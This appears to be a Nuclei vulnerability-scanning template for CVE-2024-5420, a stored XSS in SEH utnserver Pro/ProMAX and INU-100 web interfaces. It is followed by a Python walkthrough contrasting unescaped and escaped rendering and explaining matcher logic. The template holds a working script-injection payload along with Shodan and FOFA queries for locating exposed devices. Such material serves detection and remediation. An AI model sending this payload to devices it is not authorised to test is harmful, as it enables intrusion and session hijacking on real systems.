CVE-2024-5420.yaml
id: CVE-2024-5420

info:
  name: SEH utnserver Pro/ProMAX / INU-100 20.1.22 - XSS
  author: K4YD0
  severity: high
  description: |
    A vulnerability was found in utnserver Pro, utnserver ProMAX, and INU-100 version 20.1.22 and earlier, affecting the device description parameter in the web interface. This flaw allows stored cross-site scripting (XSS), enabling attackers to inject JavaScript code. The attack can be executed remotely by tricking victims into visiting a malicious website, potentially leading to session hijacking. This vulnerability is publicly disclosed and identified as CVE-2024-5420.
  reference:
    - https://cyberdanube.com/en/en-multiple-vulnerabilities-in-seh-untserver-pro/index.html
    - https://seclists.org/fulldisclosure/2024/Jun/4
  classification:
    cvss-metrics: CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:L
    cvss-score: 8.3
    cve-id: CVE-2024-5420
    cwe-id: CWE-79
  metadata:
    verified: true
    max-request: 1
    shodan-query: SEH HTTP Server
    fofa-query: title="utnserver Control Center"
    vendor: SEH Computertechnik
    product: utnserver Pro/ProMAX / INU-100
    version: 0 - 20.1.22
  tags: cve,cve2024,utnserver,xss

http:
  - method: POST
    path:
      - "{{BaseURL}}/device/description_en.html"
    headers:
      Content-Type: application/x-www-form-urlencoded
    body: |
      action=set&sys_name=%E2%80%9C%3E%3Cscript%3Ealert%28%22K4YD0%22%29%3C%2Fscript%3E&sys_descr=&sys_contact=
    # Both matchers must hit. Nuclei's default for multiple matchers is "or",
    # which would report any HTTP 200 response as a finding.
    matchers-condition: and
    matchers:
      - type: word
        name: XSS
        words:
          - '<input name="sys_name" value="“><script>alert("K4YD0")</script>" id="standort" type="text"/>'
        part: body

      - type: status
        status:
          - 200
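The template above detects the flaw by posting a value into `sys_name` and checking whether the device echoes it back unescaped inside the `<input>` tag's `value` attribute. The Python below is an added example (not part of the template or the vendor's firmware) that decodes the template's own form body, shows the CWE-79 rendering pattern next to the attribute-escaped rendering that fixes it, and re-implements the template's two matchers so the effect of `matchers-condition: and` versus the default `or` is visible. The form markup is a constructed stand-in derived from the matcher string; only that one line of the real page is known from the template.

```python
import html
from urllib.parse import parse_qs

# The URL-encoded POST body from the template, as the device's form
# handler would receive it.
TEMPLATE_BODY = (
    "action=set&sys_name=%E2%80%9C%3E%3Cscript%3Ealert%28%22K4YD0%22%29"
    "%3C%2Fscript%3E&sys_descr=&sys_contact="
)

# Constructed stand-in for the settings form the device renders; the
# real markup is known only from the matcher string in the template.
FORM_ROW = '<input name="sys_name" value="{value}" id="standort" type="text"/>'

# The exact string the template's word matcher looks for.
MATCH_WORDS = [
    '<input name="sys_name" value="\u201c><script>alert("K4YD0")</script>"'
    ' id="standort" type="text"/>'
]


def decode_body(body: str) -> dict:
    """Return the form fields as single strings, keeping empty values."""
    fields = parse_qs(body, keep_blank_values=True)
    return {k: v[0] for k, v in fields.items()}


def render_vulnerable(sys_name: str) -> str:
    """Interpolate the stored name verbatim: the CWE-79 pattern."""
    return FORM_ROW.format(value=sys_name)


def render_fixed(sys_name: str) -> str:
    """Escape for an HTML attribute context: & < > " ' become entities.

    The U+201C curly quote in the payload is left alone; it cannot close
    the attribute, which is delimited by an ASCII double quote.
    """
    return FORM_ROW.format(value=html.escape(sys_name, quote=True))


def word_matcher_hits(response_body: str, words: list) -> bool:
    """Nuclei-style word matcher with its default per-word condition (any)."""
    return any(w in response_body for w in words)


def evaluate_matchers(response_body: str, status: int, condition: str = "or") -> bool:
    """Combine the template's word and status matchers as matchers-condition does."""
    results = [word_matcher_hits(response_body, MATCH_WORDS), status == 200]
    return all(results) if condition == "and" else any(results)


if __name__ == "__main__":
    name = decode_body(TEMPLATE_BODY)["sys_name"]
    for label, page in (("vulnerable", render_vulnerable(name)),
                        ("fixed", render_fixed(name))):
        print(f"{label:10} and={evaluate_matchers(page, 200, 'and')} "
              f"or={evaluate_matchers(page, 200, 'or')}")
        print("  ", page)
```

With the `and` condition the fixed rendering is correctly reported as not vulnerable; with the default `or` condition any HTTP 200 page satisfies the template, which is why the condition line matters for a template whose status matcher accepts the normal success code.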